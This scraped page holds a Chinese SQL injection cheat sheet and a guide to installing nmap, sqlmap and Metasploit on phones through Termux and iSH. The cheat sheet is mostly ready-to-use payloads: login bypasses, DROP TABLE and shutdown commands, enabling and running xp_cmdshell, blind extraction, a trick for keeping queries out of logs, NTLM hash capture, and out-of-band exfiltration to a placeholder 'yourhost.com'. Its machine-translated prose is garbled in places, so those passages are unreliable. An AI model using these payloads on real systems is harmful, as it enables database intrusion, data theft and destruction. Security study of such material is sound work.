Quantcast
Viewing all 216 articles
Browse latest View live

sql注入备忘录资源 sql注入笔记

在这个SQL注入备忘录资源中,你可以找到详细的SQL注入漏洞技术的许多不同的变体,本次sql注入备忘录资源主要是给经验丰富的渗透测试人员以及那些刚刚开始学习漏洞挖掘的新手做一个参考.

[在本文中,用下面开头的第一个英文大写表示这个数据库]
M : MySQL
S : SQL Server
P : PostgreSQL
O : Oracle
+ : 其它类型的数据库

例如:
(MS) 意思是 : MySQL 和 SQL Server .
(M*S) 意思是 : 仅在某些版本的MySQL或特殊条件下,请参阅相关说明和SQL Server

目录列表:

语法参考,攻击示例和SQL注入攻击的奇淫技巧.
行注释
SQL注入攻击样本
内联注释
经典内联SQL注入攻击样本案例
MySQL版本检测攻击示例
堆叠查询
语言/数据库堆表查询支持
关于MySQL和PHP
堆叠SQL注入攻击样本
If语句
MySQL If语句
SQL Server If语句
If语句的SQL注入攻击示例
使用整数
字符串操作
字符串连接
不带引号的字符串
基于十六进制的SQL注入示例
字符串修改&相关
联合注入
UNION——解决语言问题
绕过登录屏幕
使xp_cmdshell在SQL Server 2005
发现在SQL Server数据库结构
快的方法基于从错误中提取数据的SQL注入SQL Server
盲注
掩盖行踪,擦除痕迹
额外的MySQL的笔记
二阶SQL注入
OOB通道的攻击

语法参考,攻击示例和SQL注入攻击的奇淫技巧.
结束/评论/意见
行注释
评论其他查询。
线的评论通常用于忽略其他查询所以你不必处理修复语法

-- (SM) 
DROP sampletable;-- 
# (M) 
DROP sampletable;#
行注释SQL注入攻击示例
Username: admin'--
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password' 
#这将把你记录为管理员用户,因为SQL查询的其余部分将被忽略。

内联注释

评论其他查询不关闭它们 或者您也可以使用 绕过黑名单 、删除空间、模糊和确定数据库版本。

/*Comment Here*/ (SM)
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members
/*! MYSQL Special SQL */ (M) 

这是一个特殊的语法MySQL示例。 它可以完美的检测MySQL版本。 如果你把一个代码放到这个评论中,它只会在MySQL中执行。 还可以在服务器较高版本中使用这个语法来执行一些代码 。 

SELECT /*!32302 1/0, */ 1 FROM tablename

经典内联SQL注入攻击样本案例

ID: 10; DROP TABLE members /* 
10; DROP TABLE members --             #简单的排除掉一些不想查询的东西
SELECT /*!32302 1/0, */ 1 FROM tablename    #如果MySQL版本高于3.23.02,将引发除以0的错误

MySQL版本检测攻击示例

ID: /*!32302 10*/
ID: 10        #如果MySQL版本高于3.23.02你会得到的相同的结果.
SELECT /*!32302 1/0, */ 1 FROM tablename      #如果MySQL版本高于3.23.02,将引发除以0的错误

堆叠查询

在一个事务中执行多个查询 。 这是非常有用的,在每一个注入点上,特别是在SQL Server应用程序中。

; (S) 
SELECT * FROM members; DROP members--

语言/数据库堆叠查询支持表

绿色: 支持, 深灰色的: 不支持, 白色: 未知的

Image may be NSFW.
Clik here to view.
sql注入备忘录资源 sql注入笔记

关于MySQL和PHP; 
澄清一些问题; 
PHP, MySQL不支持堆叠查询 ,Java不支持堆叠查询( 我相信对甲骨文来说,不太确定对其他数据库 )。 通常MySQL数据库层的支持堆叠查询,而是因为大多数的配置是不可能执行另一个查询在php MySQL应用程序或者MySQL客户端支持这一点,不太清楚。 谁能澄清吗?

堆叠SQL注入攻击示例
ID: 10;DROP members --
SELECT * FROM products WHERE id = 10; DROP members--   #正常的SQL查询后将运行删除成员SQL语句

If语句

基于一个if语句得到响应。 这是 SQL盲注的关键点之一 ,也可以是非常有用的测试简单的东西盲目和 准确地 

MySQL If语句

IF(condition,true-part,false-part) (M) 
SELECT IF(1=1,'true','false')

SQL Server If语句

IF condition true-part ELSE false-part (S) 
IF (1=1) SELECT 'true' ELSE SELECT 'false'

Oracle If语句

BEGIN
IF condition THEN true-part; ELSE false-part; END IF; END; (O) 
IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;

PostgreSQL If语句

SELECT CASE WHEN condition THEN true-part ELSE false-part END; (P) 
SELECT CASE WEHEN (1=1) THEN 'A' ELSE 'B'END;
If语句的SQL注入攻击示例
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S) 
#如果当前登录用户不是 “sa”或“dbo” ,这将不会报错.

使用整数

这是非常有效的绕过方式, magic_quotes()和类似的过滤器 ,甚至waf都可以绕过.

0xHEXNUMBER (SM)      #你可以编写这样的十六进制
SELECT CHAR(0x66) (S) 
SELECT 0x5045 (M)     #这不是一个整数,这是一个十六进制字符串
SELECT 0x50 + 0x45 (M)   #现在这是整数

字符串操作

字符串相关的操作。 这些构造sql注入不使用任何引号,绕过任何黑名单或确定后端数据库可能非常有用 .

字符串连接

+ (S) 
SELECT login + '-' + password FROM members
|| (*MO) 
SELECT login || '-' || password FROM members

*关于MySQL“| |”; 

如果mysql在ansi模式下运行,它会正常工作,否则mysql会接受它为“logical operator”,它将返回O。更好的方法是在MySQL中使用concat()函数。

CONCAT(str1, str2, str3, ...)(M)
连接提供的字符串
SELECT CONCAT(login, password) FROM members

不带引号的字符串

这些是使用字符串的一些直接方法,但始终可以使用char()(MS)和concat()(M)生成不带引号的字符串。

0x457578(M)  #字符串的十六进制表示法
SELECT 0x457578   #这将在MySQL中被做为字符串运行

在mysql中,生成字符串十六进制表示的简单方法就是使用这个 :

SELECT CONCAT('0x',HEX('c:\\boot.ini'))

在mysql中使用concat()

SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))(M)   #这将返回“KLM”
SELECT CHAR(75)+CHAR(76)+CHAR(77)(S)   #这将返回“KLM”
SELECT CHR(75)||CHR(76)||CHR(77)(O)   #这将返回“KLM”
SELECT (CHaR(75)||CHaR(76)||CHaR(77))(P)   #这将返回“KLM”

基于十六进制的SQL注入示例

SELECT LOAD_FILE(0x633A5C626F6F742E696E69)(M)   #这将会显示 C:\boot.ini  的内容

字符串修改&相关操作

ASCII () (SMP) 
SELECT ASCII('a')   #返回最左边字符的ASCII字符值。a必须具有用于盲SQL注入的函数。
CHAR()(SM)  #转换一个ASCII整数
SELECT CHAR(64)

联合注入

使用UNION,你可以执行跨表的SQL查询。基本上,你可以为所欲为的查询以另一个表返回记录。

SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members   #这将合并来自新闻表和成员表的结果,并返回所有结果

另一个例子:

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

UNION——解决语言问题

当利用union注射有时你会出现错误,因为不同的语言设置( 表设置,字段设置,结合表/ db设置等),下面这些函数是非常有用的,对于解决这种问题。 虽然这是罕见的,但是如果你处理日语,俄语,土耳其语时应该用得上.

fieldCOLLATESQL_Latin1_General_Cp1254_CS_AS      #针对SQL Server (S) 
SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members
Hex()     #针对MySQL (M)中的每一个可能的问题

绕过登录屏幕限制 (SMO+)

SQL 注入 101, 登录技巧

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--           #作为不同的用户登录(SM *) 

注:MySQL的旧版本不支持联合查询

绕过第二MD5散列检查登录屏幕

如果应用程序是首先得到返回的记录用户名,然后比较MD5密码提供的MD5那么你需要一些额外的技巧来欺骗程序绕过身份验证。 你可以联合提供的结果与一个已知的密码和MD5哈希密码。 在这种情况下,应用程序将比较你的密码和你提供的MD5哈希代替MD5从数据库。

绕过MD5散列检查示例(MSP)

admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'    #用户名
1234   #密码 81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)

通过报错—找到列名称(S)

 HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --

在select中发现列号按顺序可以加快SQL注入过程。 ORDER BY (MSO+)

ORDER BY 1--
ORDER BY 2--
ORDER BY N--   #一直往前走直到出错。错误意味着你找到了所选列的数目

数据类型、联合等


提示: 由于图像相似、字段类型不明确,请始终使用“与所有项合并”。默认情况下,联合尝试获取具有distinct的记录。
要从左表中除去不需要的记录,请使用-1或在查询开始时搜索任何不存在的记录(如果注入在何处)。如果一次只能得到一个结果,这可能很关键。
在大多数数据类型的联合注入中使用空值,而不是尝试猜测字符串、日期、整数等。
在盲目的情况下要小心,也许你能理解错误来自数据库或应用程序本身。因为像ASP.NET这样的语言在尝试使用空值时通常会抛出错误(因为开发人员通常不希望在用户名字段中看到空值)

正在查找列类型:

' union select sum(columntofind) from users-- (S) 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. 

如果没有出现错误,则表示列是数字

也可以使用Cube()或Currter()

SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--
11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-  #没有错误语法是正确的。使用MS SQL Server进程。
11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-  #没有错误——第一列是整数。
11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --  #错误!-第二列不是整数。
11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 –-  #没有错误-第二列是一个字符串。
11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 –-     #错误!-第三列不是整数.
...........
Microsoft OLE DB Provider for SQL Server error '80040e07' 
Explicit conversion from data type int to image is not allowed.. 

在合并目标错误之前,将得到 convert() 错误!因此,从 convert() 开始,然后联合

简单插入(MSO)

'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*

有用的函数/信息收集/存储过程/批量SQL注入注释

@@version(ms)
数据库版本和SQL Server的更多细节。这是常量。您可以像任何其他列一样选择它,您不需要提供表名。此外,可以使用INSERT、UPDATE语句或函数。

INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)

大容量插入(S)

将文件内容插入到表中。如果你不知道网络应用的内部路径,你可以读IISIIS 6 only)元数据库文件%StrutReal%%\Stult32 \InSrv\Meta abase.xml然后在其中搜索以确定应用路径。

  1. 创建表FO(行VARCHAR(8000))
  2. 从’C:\INETPUB\wwwStudio\Logial.asp中批量插入Foo
  3. 删除临时表,并重复另一个文件。

BCP (S)

编写文本文件。使用此函数需要登录凭据。

bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar

SQLServer中的VBS、WSH 由于ActiveX支持,可以在SQLServer中使用VBS、WSH脚本。

declare @o int 
exec sp_oacreate 'wscript.shell', @o out 
exec sp_oamethod @o, 'run', NULL, 'notepad.exe' 
用户名:声明;@ O.int Excel SPOOACRATE“WScript .shell”,“O-OUT Excel SPOOOMEDOD”O,“Run”,NULL,“No.Po.exe”

执行系统命令XPYCMCDS壳(s)

EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'  #众所周知的窍门,默认情况下它被禁用SQL Server 2005。你需要有管理员权限。
EXEC master.dbo.xp_cmdshell 'ping '  #简单的ping检测(配置防火墙或嗅探器在启动之前识别请求)

不能直接从错误或联合或其他东西读取结果

SQL Server中的一些特殊表

master..sysmessages   #错误信息
master..sysservers    #连接服务器

2000和20005的 口令(密码) 都可以是可破解的,它们使用非常相似的散列算法。

masters..sysxlogins   #SQL Server 2000
sys.sql_logins        #SQL Server 2005

SQLServer的更多存储过程

  1. Cmd Execute (xp_cmdshell)
    exec master..xp_cmdshell ‘dir’
  2. Registry Stuff (xp_regread)
    1. xp_regaddmultistring
    2. xp_regdeletekey
    3. xp_regdeletevalue
    4. xp_regenumkeys
    5. xp_regenumvalues
    6. xp_regread
    7. xp_regremovemultistring
    8. xp_regwrite
      exec xp_regread HKEY_LOCAL_MACHINE, ‘SYSTEM\CurrentControlSet\Services\lanmanserver\parameters’, ‘nullsessionshares’
      exec xp_regenumvalues HKEY_LOCAL_MACHINE, ‘SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities’

3.管理服务(xp_servicecontrol)
4.Medias (xp_availablemedia)
5.ODBC资源(xp_enumdsn)
6.登录模式xp_loginconfig)
7.创建CAB文件(xp_makecab)
8.域枚举(域枚举)(xp_ntsec_enumdomains)
9.Process Killing (需要PID(xp_terminate_process)
10.添加新程序实际上你可以执行任何你想要的)
sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’
exec xp_webserver
11.将文本文件写入UNC或内部路径( sp_makewebtask )

散列注释

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0

HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)

INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"

OPENROWSET (Transact-SQL) –http://msdn2.microsoft.com/en-us/library/ms190312.aspx

在SQL Server INSERT查询中不能使用子选项。

SQL Injection in LIMIT (M) or ORDER (MSO)

SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;

如果注入有时间限制你可以评论或使用union注入

关闭SQLServer(s)

当你真的生气的时候,';shutdown --

在SQL Server 2005中启用xp_cmdshell 

默认情况下,在SQLServer 2005中禁用xp_cmdshell 和其他潜在危险的存储过程。如果您有管理员访问权限,则可以启用这些访问权限。

EXEC sp_configure 'show advanced options',1 
RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1 
RECONFIGURE

在SQL Server中查找数据库结构(S)

获取用户定义表

SELECT name FROM sysobjects WHERE xtype = 'U'

获取列名

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')

移动记录(S)

修改和使用NOT INNOT EXIST
... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members)——非常好的一个

使用奇淫技巧
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int 

Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21

SQLServer中基于错误的SQL注入数据提取的快速方法

';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--

详细条款:基于错误的SQL注入提取数据的快速方法

在MySQL中查找数据库结构(m)

获取用户定义表

SELECT table_name FROM information_schema.tables WHERE table_schema = 'databasename'

获取列名

SELECT table_name, column_name FROM information_schema.columns WHERE table_name = 'tablename'

在Oracle(o)中查找数据库结构

获取用户定义表

SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'

获取列名

SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'

SQL盲注

关于Blind SQL

在一个相当好的生产应用中您无法看到页面上的错误响应。因此,不能通过联合攻击或基于错误的攻击来提取数据。必须使用盲SQL注入攻击来提取数据。有两种盲SQL注入。

正常Blind您无法在页面中看到响应,但仍然可以根据响应或HTTP状态代码确定查询的结果。
完全Blind在任何类型的输出中,你都看不出有什么不同。这可以是一个测井函数或类似的注入。但并不常见。

在正常的百叶窗中,你可以使用if语句或滥用注入中的查询一般容易在完全的百叶窗中,你需要使用一些等待功能并分析响应时间。为此你可以使用等待延迟’0:0:10 ‘在SQLServer中,基准标记()和sleep(10)在MySQL中,pg_sleep(10)在PostgreSQL中,以及Oracle中的一些PL/SQL技巧。

实数和复杂的盲SQL注入攻击样本

这个输出来自于一个真正的私有盲SQL注入工具,同时利用了SQL Server后端应用程序和枚举表名。此请求对第一个表名的第一个字符进行了处理。由于自动化的原因,SQL查询有点复杂。在本文中,我们试图通过二进制搜索算法来确定字符的ASCII值。

真的错误的标志标记查询返回true或false。

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78-- 

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103-- 

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) 
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89-- 

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) 
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83-- 

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0) 
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80-- 

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)

既然两者都最后2个查询失败我们清楚地知道表名的第一个字符。ASCII值为80,这意味着第一个字符是“P”。。这是利用二进制搜索算法开发盲SQL注入的方法。另一种众所周知的方法是逐位读取数据。两者在不同的条件下都能有效。

为盲SQL注入攻击创建数据库等待/休眠

首先,如果这是真的盲目,否则只需使用1/0种风格的错误来识别差异。第二,使用次数超过20-30秒时要小心。数据库API连接或脚本可以超时。

等待延迟时间

这就像睡眠,等待指定的时间。CPU安全的方式使数据库等待。

WAITFOR DELAY '0:0:10'--

同样,你可以使用这样的分数,

WAITFOR DELAY '0:0:0.51'

真实世界样本

我们是“SA”吗?
if (select user) = 'sa' waitfor delay '0:0:10'
ProductID =1;waitfor delay '0:0:10'--
ProductID =1);waitfor delay '0:0:10'--
ProductID =1';waitfor delay '0:0:10'--
ProductID =1');waitfor delay '0:0:10'--
ProductID =1));waitfor delay '0:0:10'--
ProductID =1'));waitfor delay '0:0:10'--

基准标记(m)

基本上,我们滥用这个命令让MySQL稍稍等待。小心,你会消耗Web服务器限制这么快!

BENCHMARK(howmanytimes, do this)

真实世界样本

  • 我们是root吗?woot!
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))
  • MySQL中存在校验表
IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

PGY睡眠(秒)(P)

睡眠供应秒。

SELECT pg_sleep(10); #睡眠10秒

睡眠(秒)(m)

睡眠供应秒。

SELECT sleep(10); #睡眠10秒

接收消息(O)

睡眠供应秒。

(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100) THEN dbms_pipe.receive_message(('xyz'),10) ELSE dbms_pipe.receive_message(('xyz'),1) END FROM dual)

{INJECTION}= You want to run the query.如果条件属实,将在10秒后回复。如果是假的,将延迟一秒。

覆盖你的足迹

SQLServer – SPAX密码日志旁路(S)

出于安全原因,SQL Server不记录包含SPI密码的查询(!)因此,如果向查询添加SPY密码,它将不在SQLServer日志中(当然还会出现在Web服务器日志中如果可能的话,尝试使用POST

清除SQL注入测试

这些测试对于盲SQL注入和无声攻击来说是很好的。

  1. product.asp?id=4 (SMO)
    1. product.asp?id=5-1
    2. product.asp?id=4 OR 1=1 

  2. product.asp?name=Book
    1. product.asp?name=Bo'%2b'ok
    2. product.asp?name=Bo' || 'ok (OM)
    3. product.asp?name=Book' OR 'x'='x

额外的MySQL注释

  • 子查询只运行MySQL 4.1
  • 用户
    • SELECT User,Password FROM mysql.user;
  • SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';
  • SELECT ... INTO DUMPFILE
    • Write query into anew file无法修改现有文件
  • UDF函数
    • create function LockWorkStation returns integer soname 'user32';
    • select LockWorkStation(); 
    • create function ExitProcess returns integer soname 'kernel32';
    • select exitprocess();
  • SELECT USER();
  • SELECT password,USER() FROM mysql.user;
  • 管理哈希的第一个字节
    • SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
  • 读取文件
    • query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
  • MySQL载入数据
    • 默认情况下,它不可用!
      • create table foo( line blob ); 
        load data infile 'c:/boot.ini' into table foo; 
        select * from foo;
  • MySQL中的更多时间
  • select benchmark( 500000, sha1( 'test' ) );
  • query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
  • select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' ); 
    枚举数据,猜测蛮力
    • select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );

潜在有用的MySQL函数

  • MD5()
    MD5 Hashing
  • SHA1()
    SHA1 Hashing
  • PASSWORD()
  • ENCODE()
  • COMPRESS()
    压缩数据,可以在盲SQL注入中的大二进制读取中很好。
  • ROW_COUNT()
  • SCHEMA()
  • VERSION()
    等同于@@version

二阶SQL注入

基本上,您将SQL注入到某个地方,并期望它在另一个动作中未被过滤。这是常见的隐藏层问题。

Name :' + (SELECT TOP 1 password FROM users ) + ' 
Email : xx@xx.com

如果应用程序在不安全的存储过程或函数、进程等中使用Name字段,那么它将插入第一个用户密码作为您的姓名等。

强制SQL Server获取NTLM散列

此攻击可以帮助您获得目标服务器的SQLServer用户的Windows密码,但可能您的入站连接将防火墙。可以是非常有用的内部渗透测试。我们强制SQLServer连接我们的Windows UNC共享,并用CAAIN和阿贝尔这样的工具捕获数据NTLM会话。

来自UNC共享的大容量插入
bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'

检查大容量插入引用,了解如何使用大容量插入。

带外信道攻击

SQL Server

  • ?vulnerableParam=1; SELECT * FROM OPENROWSET(‘SQLOLEDB’, ({INJECTION})+’.yourhost.com’;’sa’;’pwd’, ‘SELECT 1’)
    使DNS解析请求为{注销}。

  • ?vulnerableParam=1; DECLARE @q varchar(1024); SET @q = ‘\\’+({INJECTION})+’.yourhost.com\\test.txt’; EXEC master..xp_dirtree @q
    使DNS解析请求为{注册表}。

    {INJECTION} = You want to run the query.

mysql

  • ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat(‘\\\\’,({INJECTION}), ‘yourhost.com\\’)))
    向No.SoC发出NBNS查询请求/ DNS解析请求
  • ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE ‘\\\\yourhost.com\\share\\output.txt’)
    将数据写入共享文件夹/文件{INJECTION} = You want to run the query.

Oracle

  • ?vulnerableParam=(SELECT UTL_HTTP.REQUEST(‘http://host/ sniff.php?sniff=’||({INJECTION})||”) FROM DUAL)
    嗅探应用程序将保存结果
  • ?vulnerableParam=(SELECT UTL_HTTP.REQUEST(‘http://host/ ‘||({INJECTION})||’.html’) FROM DUAL)
    结果将保存在HTTP访问日志中。
  • ?vulnerableParam=(SELECT UTL_INADDR.get_host_addr(({INJECTION})||’.yourhost.com’) FROM DUAL)
    您需要嗅探DNS解析请求到您的HooSt.com。
  • ?vulnerableParam=(SELECT SYS.DBMS_LDAP.INIT(({INJECTION})||’.yourhost.com’,80) FROM DUAL)
    您需要嗅探DNS解析请求到您的HooSt.com。{INJECTION} = You want to run the query.

脆弱性分类和严重性表

分类id/严重程度
PCI v3.16.5.1
PCI v3.26.5.1
OWASP 2013A1
CWE89
CAPEC66
WASC19
HIPAA164.306(a), 164.308(a)
CVSS 3评分
基地10(高危)
时间的10(高危)
环境10(高危)
向量串
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

from


免root将手机(Android&IOS)改造成移动渗透神器

渗透测试人员都习惯一台笔记本走天下,但有的时候笔记本还是太大,一些地方用笔记本做渗透测试还是太招摇,而且有的时候也不会随身都带笔记本。这时如果可以利用随身携带的手机进行渗透,想想都很酷。众所周知,手机版的kali就是Kali NetHunter,但这神器一是要刷机,二是适配的手机非常少,三是即使刷成功了,那你手机上原来的各种软件就不那么好用了。今天跟大家分享一下如何在手机(Android&IOS)上不刷机、免root安装nmap、sqlmap、msf等工具,将手机改造成移动渗透利器。

Android 篇

0x01 安装Termux

Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.
Image may be NSFW.
Clik here to view.

Termux是一款开源且不需要root,运行在Android终端上极其强大的linux模拟器,支持apt管理软件包,完美支持python,ruby,go,nodejs。
termux 下载: https://github.com/termux/termux-app
termux 官网:https://termux.com/
安装第一次打开会显示下图:

注意,安装完成后要进行权限设置,Termux只有一个存储权限,记得打开,否则Termux会一直如上图一样旋转;

安装完毕,Termux登场:

0x02 Termux基本使用

  • Termux界面长按屏幕,显示菜单项(包括返回、复制、粘贴、更多),此时屏幕出现可选择的复制光标。
  • Termux界面从左向右滑动,显示隐藏式导航栏,可以新建、切换、重命名会话session和调用弹出输入法

常用快捷键:

音量-键(Ctrl)+L                清除屏幕内容
音量-键(Ctrl)+C                终止当前操作
音量-键(Ctrl)D                 退出当前会话session
音量+键+D                      Tab键(可自动补全命令或文件名)
音量+键+W                      方向键 上(可显示前一条命令)
音量+键+S                      方向键 下(可显示后一条命令)
音量+键+A                      方向键 左(可左移动光标)
音量+键+D                      方向键 右(可右移动光标)
音量+键+Q                      显示或关闭扩展键(ESC、插入链接CTR、ALT、TAB、-、/、|以及左滑扩展键一栏可切换到全功能支持手机输入法的输入框)

常用命令(和linux基本类似):

apt update                    更新源
apt search <query>            全文搜索可安装包
apt install <package>         安装软件包
apt upgrade                   升级软件包
apt show  <package>           显示软件包的信息
apt list [--installed]        列出所有(或已安装)的软件包信息
apt remove <package>          删除软件包
chmod                         修改文件权限
chown                         修改文件归属
...

0x03 打造Android渗透神器

1、更新源:

apt update && apt upgrade   
cd ..
cd usr/etc/apt
vim sources.list

修改源:

deb [arch=all,aarch64] http://mirrors.tuna.tsinghua.edu.cn/termux stable main
Image may be NSFW.
Clik here to view.
apt update

2、安装nmap

apt install nmap
Image may be NSFW.
Clik here to view.

很方便,完成后在手机上出现熟悉界面:

3、安装sqlmap

首先安装运行sqlmap所需要的包python2,以及clone GitHub包的git包

apt install python2 git
git clone https://github.com/sqlmapproject/sqlmap
Image may be NSFW.
Clik here to view.

时间略长,完成后在手机上出现熟悉界面:

4、安装msf
首先安装wget:

pkg install wget

下载msf安装脚本:

wget https://Auxilus.github.io/metasploit.sh

运行安装脚本:

sh metasploit.sh
Image may be NSFW.
Clik here to view.

这个过程比较慢,大概需要40分钟左右,成功后,在手机中出现熟悉的界面:

IOS 篇

0x01 安装iSH

iSH是一个使用usermode x86模拟器将Linux shell引入IOS设备的工具,基于Alpine Linux,该程序占用空间小,具备一定的安全性且易于上手。不过目前iSH还处于测试阶段,部分功能还不完善。

iSH github地址:https://github.com/tbodt/ish

Image may be NSFW.
Clik here to view.

由于目前iSH还是beta版,所以想要在IOS设备上安装iSH,首先需要安装APP TestFlight,它可以帮助开发人员测试 Beta 版 App。TestFlight运行环境要求: iOS 8 或更高版本的 iPhone、iPad 或 iPod touch。

Image may be NSFW.
Clik here to view.

安装TestFlight后,打开链接: https://testflight.apple.com/join/97i7KM8O ,然后点击“开始测试”,如图所示,就可以打开TestFlight并收到加入iSH测试版的邀请了。

Image may be NSFW.
Clik here to view.

安装iSH完毕后,出现iSH界面:

0x02 iSH基本使用

Image may be NSFW.
Clik here to view.

iSH自带了多功能键盘:

上图中的四个图标分为是:TAB键、Shift键、ESC键以及可以滑动的方向键,结合手机的键盘,基本可以满足shell的一些操作。

常用命令:

apk update                    更新源
apk search <query>            全文搜索可安装包
apk add <package>             安装软件包
